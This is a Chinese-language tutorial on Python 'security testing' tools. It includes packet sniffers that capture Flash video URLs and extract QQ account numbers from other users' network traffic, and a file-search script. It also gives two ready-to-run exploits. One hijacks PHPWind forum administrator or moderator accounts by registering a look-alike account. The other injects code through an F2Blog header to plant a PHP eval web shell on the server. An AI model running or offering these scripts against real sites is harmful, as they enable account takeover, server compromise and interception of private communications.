Python安全测试辅助工具开发指南<\/h1>

1. 网络数据包嗅探技术<\/h2>

1.1 Flash播放地址嗅探<\/h3>
import<\/span> pcap,<\/span> struct,<\/span> re
<\/span><\/span>from<\/span> pickle import<\/span> dump, load
<\/span><\/span>
<\/span><\/span># 创建pcap对象<\/span>
<\/span><\/span>pack =<\/span> pcap.<\/span>pcap()
<\/span><\/span># 设置过滤规则，只捕获TCP端口80的数据<\/span>
<\/span><\/span>pack.<\/span>setfilter('tcp port 80'<\/span>)
<\/span><\/span>
<\/span><\/span># 定义匹配Flash视频的正则表达式<\/span>
<\/span><\/span>regx =<\/span> r<\/span>'\/[\w+|\/]+.flv|\/[\w+|\/]+.swf'<\/span>
<\/span><\/span>urls =<\/span> []
<\/span><\/span>hosts =<\/span> []
<\/span><\/span>
<\/span><\/span>print('start capture....'<\/span>)
<\/span><\/span>for<\/span> recv_time, recv_data in<\/span> pack:
<\/span><\/span>    urls =<\/span> re.<\/span>findall(regx, recv_data)
<\/span><\/span>    if<\/span>(len(urls) !=<\/span> 0<\/span>):
<\/span><\/span>        print(urls)
<\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p>

使用pcap库进行网络数据包捕获<\/li>
通过setfilter方法过滤TCP 80端口(HTTP)流量<\/li>
正则表达式匹配.flv和.swf文件路径<\/li>
实时捕获并显示匹配的URL<\/li>
<\/ul>
1.2 QQ号码嗅探<\/h3>
# -*- coding: cp936 -*-<\/span>
<\/span><\/span>import<\/span> pcap,<\/span> struct
<\/span><\/span>
<\/span><\/span>pack =<\/span> pcap.<\/span>pcap()
<\/span><\/span>pack.<\/span>setfilter('udp'<\/span>)  # QQ使用UDP协议<\/span>
<\/span><\/span>key =<\/span> ''<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> recv_time, recv_data in<\/span> pack:
<\/span><\/span>    recv_len =<\/span> len(recv_data)
<\/span><\/span>    # 根据QQ协议特征识别数据包<\/span>
<\/span><\/span>    if<\/span> recv_len ==<\/span> 102<\/span> and<\/span> recv_data[42<\/span>] ==<\/span> chr(02<\/span>) and<\/span> recv_data[101<\/span>] ==<\/span> chr(03<\/span>):
<\/span><\/span>        print(struct.<\/span>unpack('>I'<\/span>, recv_data[49<\/span>:53<\/span>])[0<\/span>])  # 解包QQ号码<\/span>
<\/span><\/span>    elif<\/span> recv_len ==<\/span> 55<\/span>:
<\/span><\/span>        print(struct.<\/span>unpack('>I'<\/span>, recv_data[49<\/span>:53<\/span>])[0<\/span>])
<\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p>

过滤UDP协议数据包<\/li>
通过数据包长度和特定位置字符识别QQ协议包<\/li>
使用struct解包数据获取QQ号码<\/li>
注意编码声明(cp936)确保中文兼容<\/li>
<\/ul>
2. 文件内容搜索工具<\/h2>
import<\/span> os,<\/span> string,<\/span> re,<\/span> sys
<\/span><\/span>
<\/span><\/span>class<\/span> SevenFile<\/span>:
<\/span><\/span>    files =<\/span> []
<\/span><\/span>    
<\/span><\/span>    def<\/span> FindContent<\/span>(self, path):
<\/span><\/span>        print('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'<\/span>)
<\/span><\/span>        walks =<\/span> os.<\/span>walk(path)
<\/span><\/span>        for<\/span> walk in<\/span> walks:
<\/span><\/span>            for<\/span> filename in<\/span> walk[2<\/span>]:
<\/span><\/span>                if<\/span>('.mht'<\/span> ==<\/span> filename[-<\/span>4<\/span>:]):  # 只搜索.mht文件<\/span>
<\/span><\/span>                    res_taskid =<\/span> []
<\/span><\/span>                    file =<\/span> walk[0<\/span>] +<\/span> '<\/span>\\<\/span>'<\/span> +<\/span> filename
<\/span><\/span>                    f =<\/span> open(file)
<\/span><\/span>                    content =<\/span> f.<\/span>read()
<\/span><\/span>                    # 编译正则表达式，忽略大小写<\/span>
<\/span><\/span>                    pattern_taskid =<\/span> re.<\/span>compile(r<\/span>'Stonehenge-UIVerificationChecklist\.mht'<\/span>, re.<\/span>IGNORECASE)
<\/span><\/span>                    res_taskid =<\/span> pattern_taskid.<\/span>findall(content)
<\/span><\/span>                    f.<\/span>close()
<\/span><\/span>                    if<\/span> len(res_taskid) ><\/span> 0<\/span>:
<\/span><\/span>                        self.<\/span>files.<\/span>append(file)
<\/span><\/span>
<\/span><\/span>def<\/span> run<\/span>():
<\/span><\/span>    f =<\/span> SevenFile()
<\/span><\/span>    f.<\/span>FindContent(r<\/span>"E:\work\AP\Manual Tests\PSIGTestProject\PSIGTestProject"<\/span>)
<\/span><\/span>    for<\/span> filepath in<\/span> f.<\/span>files:
<\/span><\/span>        print(filepath)
<\/span><\/span>        print("OK"<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    run()
<\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p>

使用os.walk递归遍历目录<\/li>
文件扩展名过滤(.mht)<\/li>
正则表达式内容匹配<\/li>
跨平台路径处理(注意Windows反斜杠)<\/li>
主程序入口检查(name<\/strong> == "main<\/strong>")<\/li>
<\/ul>
3. Web安全测试工具<\/h2>
3.1 PHPWind论坛漏洞利用<\/h3>
# -*- coding: gb2312 -*-<\/span>
<\/span><\/span>import<\/span> urllib2,<\/span> httplib,<\/span> sys
<\/span><\/span>
<\/span><\/span>httplib.<\/span>HTTPConnection.<\/span>debuglevel =<\/span> 1<\/span>
<\/span><\/span>cookies =<\/span> urllib2.<\/span>HTTPCookieProcessor()
<\/span><\/span>opener =<\/span> urllib2.<\/span>build_opener(cookies)
<\/span><\/span>
<\/span><\/span>def<\/span> usage<\/span>():
<\/span><\/span>    print("Usage:<\/span>\n<\/span>"<\/span>)
<\/span><\/span>    print(" $ .\/phpwind.py pwforumurl usertoattack<\/span>\n<\/span>"<\/span>)
<\/span><\/span>    print(" pwforumurl 目标论坛地址如http:\/\/www.80sec.com\/"<\/span>)
<\/span><\/span>    print(" usertoattack 目标拥有权限的斑竹或管理员"<\/span>)
<\/span><\/span>    print(" ×××结果将会在目标论坛注册一个和目标用户一样的帐户"<\/span>)
<\/span><\/span>    print(" 最新版本可以使用uid登陆"<\/span>)
<\/span><\/span>    print(" 其他版本可以使用cookie+useragent登陆"<\/span>)
<\/span><\/span>    print(""<\/span>)
<\/span><\/span>
<\/span><\/span>argvs =<\/span> sys.<\/span>argv
<\/span><\/span>usage()
<\/span><\/span>
<\/span><\/span>data =<\/span> "regname=<\/span>%s<\/span> <\/span>%s<\/span>1&ampregpwd=@80sec&ampregpwdrepeat=@80sec&ampregemail=...@foo.com&ampregemailtoall=1&step=2"<\/span> %<\/span> (argvs[2<\/span>], "<\/span>%c<\/span>1"<\/span>)
<\/span><\/span>pwurl =<\/span> "<\/span>%s<\/span>\/register.php"<\/span> %<\/span> argvs[1<\/span>]
<\/span><\/span>
<\/span><\/span>request =<\/span> urllib2.<\/span>Request(
<\/span><\/span>    url =<\/span> pwurl,
<\/span><\/span>    headers =<\/span> {
<\/span><\/span>        'Content-Type'<\/span>: 'application\/x-www-form-urlencoded'<\/span>,
<\/span><\/span>        'User-Agent'<\/span>: '80sec owned this'<\/span>
<\/span><\/span>    },
<\/span><\/span>    data =<\/span> data)
<\/span><\/span>
<\/span><\/span>f =<\/span> opener.<\/span>open(request)
<\/span><\/span>headers =<\/span> f.<\/span>headers.<\/span>dict
<\/span><\/span>cookie =<\/span> headers["set-cookie"<\/span>]
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    if<\/span> cookie.<\/span>index('winduser'<\/span>):
<\/span><\/span>        print("Exploit Success!"<\/span>)
<\/span><\/span>        print("Login with uid password @80sec or Cookie:"<\/span>)
<\/span><\/span>        print(cookie)
<\/span><\/span>        print("User-agent: 80sec owned this"<\/span>)
<\/span><\/span>except<\/span>:
<\/span><\/span>    print("Error! http:\/\/www.80sec.com"<\/span>)
<\/span><\/span>    print("Connect root#80sec.com"<\/span>)
<\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p>

使用urllib2处理HTTP请求和Cookie<\/li>
构造恶意注册表单数据<\/li>
特殊字符(%c1)绕过注册限制<\/li>
自定义User-Agent标识<\/li>
错误处理和结果验证<\/li>
<\/ul>
3.2 SQL注入工具示例<\/h3>
#!c:\python24\pyton<\/span>
<\/span><\/span># Exploit For F2Blog All Version<\/span>
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> httplib
<\/span><\/span>from<\/span> urlparse import<\/span> urlparse
<\/span><\/span>from<\/span> time import<\/span> sleep
<\/span><\/span>
<\/span><\/span>def<\/span> injection<\/span>(realurl, path, evil):
<\/span><\/span>    cmd =<\/span> ""<\/span>
<\/span><\/span>    cookie =<\/span> ""<\/span>
<\/span><\/span>    header =<\/span> {
<\/span><\/span>        'Accept-Language'<\/span>: 'zh-cn'<\/span>,
<\/span><\/span>        'Referer'<\/span>: 'http:\/\/'<\/span> +<\/span> realurl[1<\/span>] +<\/span> path +<\/span> 'index.php'<\/span>,
<\/span><\/span>        'Content-Type'<\/span>: 'application\/x-www-form-urlencoded'<\/span>,
<\/span><\/span>        'User-Agent'<\/span>: useragent,
<\/span><\/span>        'Host'<\/span>: realurl[1<\/span>],
<\/span><\/span>        'Content-length'<\/span>: len(cmd),
<\/span><\/span>        'Connection'<\/span>: 'Keep-Alive'<\/span>,
<\/span><\/span>        'X-Forwarded-For'<\/span>: evil,
<\/span><\/span>        'Cookie'<\/span>: cookie
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    http =<\/span> httplib.<\/span>HTTPConnection(realurl[1<\/span>])
<\/span><\/span>    http.<\/span>request("POST"<\/span>, path +<\/span> "index.php"<\/span>, cmd, header)
<\/span><\/span>    sleep(1<\/span>)
<\/span><\/span>    
<\/span><\/span>    http1 =<\/span> httplib.<\/span>HTTPConnection(realurl[1<\/span>])
<\/span><\/span>    http1.<\/span>request("GET"<\/span>, path +<\/span> "cache\/test11.php"<\/span>)
<\/span><\/span>    response =<\/span> http1.<\/span>getresponse()
<\/span><\/span>    re1 =<\/span> response.<\/span>read()
<\/span><\/span>    
<\/span><\/span>    if<\/span> re1.<\/span>find('test'<\/span>) ==<\/span> 0<\/span>:
<\/span><\/span>        print('Expoilt Success!<\/span>\n<\/span>'<\/span>)
<\/span><\/span>        print('View Your shell:<\/span>\t<\/span>%s<\/span>'<\/span> %<\/span> shell)
<\/span><\/span>        sys.<\/span>exit(1<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        sys.<\/span>stdout.<\/span>write("Expoilt FALSE!"<\/span>)
<\/span><\/span>        http.<\/span>close()
<\/span><\/span>        sys.<\/span>stdout.<\/span>write("<\/span>\n<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    print('Exploit For F2Blog All Version'<\/span>)
<\/span><\/span>    print('Codz by pt...@vip.sina.com<\/span>\n<\/span>'<\/span>)
<\/span><\/span>    
<\/span><\/span>    if<\/span> len(sys.<\/span>argv) ==<\/span> 2<\/span>:
<\/span><\/span>        url =<\/span> urlparse(sys.<\/span>argv[1<\/span>])
<\/span><\/span>        if<\/span> url[2<\/span>:-<\/span>1<\/span>]:
<\/span><\/span>            u =<\/span> url[2<\/span>] +<\/span> '\/'<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            u =<\/span> url[2<\/span>]
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print("Usage: <\/span>%s<\/span> <url> "<\/span> %<\/span> sys.<\/span>argv[0<\/span>])
<\/span><\/span>        print("Example: <\/span>%s<\/span> http:\/\/127.0.0.1\/bk"<\/span> %<\/span> sys.<\/span>argv[0<\/span>])
<\/span><\/span>        sys.<\/span>exit(0<\/span>)
<\/span><\/span>
<\/span><\/span>    print('[+] Connect <\/span>%s<\/span>'<\/span> %<\/span> url[1<\/span>])
<\/span><\/span>    print('[+] Trying...'<\/span>)
<\/span><\/span>    print('[+] Plz wait a long long time...'<\/span>)
<\/span><\/span>    
<\/span><\/span>    global<\/span> shell, useragent
<\/span><\/span>    shell =<\/span> "http:\/\/"<\/span> +<\/span> url[1<\/span>] +<\/span> u +<\/span> "cache\/test11.php"<\/span>
<\/span><\/span>    query =<\/span> 'fputs(fopen(<\/span>\'<\/span>cache\/test11.php<\/span>\'<\/span>,<\/span>\'<\/span>w+ @eval($_REQUEST[c])?>test<\/span>\'<\/span>)'<\/span>
<\/span><\/span>    query +=<\/span> ';\/*'<\/span>
<\/span><\/span>    evilip =<\/span> query
<\/span><\/span>    useragent =<\/span> ""<\/span>
<\/span><\/span>    cookie =<\/span> ""<\/span>
<\/span><\/span>    
<\/span><\/span>    injection(url, u, evilip)
<\/span><\/span>    evilip =<\/span> ""<\/span>
<\/span><\/span>    injection(url, u, evilip)
<\/span><\/span>    print('[+] Finished'<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p>

使用httplib发送HTTP请求<\/li>
构造恶意X-Forwarded-For头进行注入<\/li>
通过时间延迟判断注入结果<\/li>
命令行参数处理<\/li>
结果验证(test11.php文件生成)<\/li>
<\/ul>
4. 高级安全测试工具推荐<\/h2>
4.1 sqlmap简介<\/h3>
sqlmap是一个功能强大的自动化SQL注入工具，支持：<\/p>

多种数据库：MySQL, Oracle, PostgreSQL, SQL Server, Access, DB2, Informix, Sybase<\/li>
多种注入技术：盲注、错误回显注入、时间延迟注入等<\/li>
多种请求方式：GET, POST, Cookie注入<\/li>
高级功能：指纹识别、代理支持、优化算法<\/li>
<\/ul>
获取方式：<\/strong>

自行搜索下载，官方网站：http:\/\/sqlmap.org\/<\/p>
5. Python安全测试开发要点总结<\/h2>


网络嗅探基础<\/strong><\/p>

使用pcap库捕获网络数据包<\/li>
通过协议特征识别特定应用流量<\/li>
正则表达式匹配关键信息<\/li>
<\/ul>
<\/li>

文件系统操作<\/strong><\/p>

os.walk递归遍历目录<\/li>
文件内容正则匹配<\/li>
大文件处理技巧<\/li>
<\/ul>
<\/li>

Web安全测试<\/strong><\/p>

使用urllib2\/httplib发送HTTP请求<\/li>
Cookie和Header处理<\/li>
漏洞利用代码构造<\/li>
<\/ul>
<\/li>

开发实践<\/strong><\/p>

命令行参数处理<\/li>
跨平台兼容性<\/li>
错误处理和日志记录<\/li>
<\/ul>
<\/li>

高级工具<\/strong><\/p>

了解sqlmap等专业工具<\/li>
学习其设计思路和实现方法<\/li>
根据实际需求开发定制化工具<\/li>
<\/ul>
<\/li>
<\/ol>
通过掌握这些Python安全测试技术，可以大大提高安全测试效率，自动化重复性工作，并开发出适合特定需求的专用工具。<\/p>